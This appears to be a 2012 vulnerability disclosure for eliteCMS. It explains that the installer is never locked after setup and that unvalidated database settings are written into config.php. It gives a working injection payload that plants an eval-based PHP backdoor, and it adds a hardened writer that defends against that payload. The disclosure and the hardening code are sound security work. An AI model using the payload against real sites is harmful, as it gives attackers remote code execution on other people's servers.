
eliteCMS: installer not locked after installation + one-line shell write vulnerability

Posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation finishes, so an attacker can re-run the installation simply by visiting the installer URL.

The other vulnerability is that the installer can write a one-line shell directly into admin/includes/config.php.

Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
    ...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.

If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written to /admin/includes/config.php.

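As an added example (not eliteCMS's own code), here is how the step-4 writer described above could be hardened: an install-lock check so the installer cannot be re-run, a strict character whitelist for the host, database and user names, and var_export() instead of string interpolation so a value can never break out of the generated PHP. The names install_locked(), valid_db_identifier(), build_config() and the install.lock path are assumptions for this example.

```php
<?php
// Added example, not eliteCMS code: a hardened step-4 config writer.
// install_locked(), valid_db_identifier(), build_config() and the lock path are hypothetical.

// Refuse to re-run the installer once it has completed. The original never
// checks this, which is why the install URL stays usable after setup.
function install_locked(string $lockFile): bool
{
    return file_exists($lockFile);
}

// Host, database and user names are limited to a conservative charset, so a
// value carrying quotes or PHP tags is rejected before anything is written.
function valid_db_identifier(string $value): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_.:-]{1,64}$/', $value);
}

// Build config.php without interpolating raw input. var_export() emits a
// quoted, escaped PHP literal, so a value cannot close the string or the tag.
function build_config(array $in): string
{
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER'] as $k) {
        if (!isset($in[$k]) || !valid_db_identifier($in[$k])) {
            throw new InvalidArgumentException("invalid $k");
        }
    }
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER'] as $k) {
        $out .= "define('$k', " . var_export($in[$k], true) . ");\n";
    }
    $pass = isset($in['DB_PASS']) ? (string) $in['DB_PASS'] : '';
    $out .= "define('DB_PASS', " . var_export($pass, true) . ");\n";
    return $out; // no closing PHP tag, so nothing can trail the config
}

// Constructed inputs: the payload quoted in the post, first as DB_NAME (rejected)
// and then as DB_PASS (written, but only as an inert single-quoted literal).
$payload = '"?><?php eval($_POST[c]);?><?php';
$base = ['DB_SERVER' => 'localhost', 'DB_NAME' => 'elitecms',
         'DB_USER' => 'elite', 'DB_PASS' => 's3cret'];
if (install_locked(__DIR__ . '/install.lock')) {
    exit("installer is locked\n");
}
try {
    build_config(array_merge($base, ['DB_NAME' => $payload]));
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
echo build_config(array_merge($base, ['DB_PASS' => $payload]));
```

Passwords legitimately contain arbitrary characters, so they are not whitelisted; var_export() escapes the backslash and single quote, which is all a single-quoted PHP literal needs to stay inert.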